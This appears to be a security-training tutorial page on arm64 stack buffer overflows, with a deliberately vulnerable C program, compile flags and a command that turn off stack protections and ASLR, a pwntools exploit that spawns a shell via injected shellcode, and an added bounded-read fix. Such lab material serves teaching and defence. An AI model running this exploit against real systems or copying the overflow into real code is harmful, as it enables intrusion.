Stack Shellcode - arm64


tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Find an introduction to arm64 in:

{{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}}

Code

```c
#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
    char buffer[64];
    read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
    vulnerable_function();
    return 0;
}
```

Compile without PIE, stack canary and NX:

```bash
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
```
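As an added example (not code from the original page or from the HackTricks project): the fixed counterpart of `vulnerable_function`, where the `read()` size is derived from the buffer size instead of the literal 256, plus a self-check that pushes the same 256 bytes through a pipe and confirms only 63 are stored. `read_bounded`, `fixed_function` and `demo_overlong_input` are hypothetical names.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 64

/* Read at most cap-1 bytes from fd into buf and always NUL-terminate.
 * Returns the number of bytes stored, or -1 on error (cap == 0 or a failed
 * read()). The request size comes from the destination size, unlike the
 * page's read(STDIN_FILENO, buffer, 256) into a 64-byte buffer. */
ssize_t read_bounded(int fd, char *buf, size_t cap) {
    if (cap == 0) return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) { buf[0] = '\0'; return -1; }
    buf[n] = '\0';
    return n;
}

/* Fixed counterpart of vulnerable_function(): sizeof buffer, not a literal,
 * bounds the read, so the saved return address above buffer cannot be reached. */
ssize_t fixed_function(int fd) {
    char buffer[BUF_SIZE];
    return read_bounded(fd, buffer, sizeof buffer);
}

/* Self-check: send the 256 bytes the original accepts through a pipe
 * (constructed input) and confirm only BUF_SIZE-1 are stored.
 * Returns 1 on success, 0 otherwise. */
int demo_overlong_input(void) {
    int fds[2];
    char junk[256], buffer[BUF_SIZE];
    if (pipe(fds) != 0) return 0;
    memset(junk, 'A', sizeof junk);
    if (write(fds[1], junk, sizeof junk) != (ssize_t)sizeof junk) return 0;
    close(fds[1]);
    ssize_t n = read_bounded(fds[0], buffer, sizeof buffer);
    close(fds[0]);
    return n == BUF_SIZE - 1 && strlen(buffer) == BUF_SIZE - 1;
}

int main(void) {
    int ok = demo_overlong_input();
    printf("bounded read kept %d bytes: %s\n", BUF_SIZE - 1, ok ? "ok" : "FAIL");
    return ok ? 0 : 1;
}
```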

No ASLR & No canary - Stack Overflow

To disable ASLR run:

```bash
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```

To find the offset of the bof check this link.

Exploit:

```python
from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: " + str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()
```

The only "hard" thing to find here is the stack address to jump to. In my case I built the exploit with the address found using gdb, but when I then ran the exploit it didn't work (because the stack address had shifted slightly).

I opened the generated core file (`gdb ./bof ./core`) and checked the real address of the start of the shellcode.
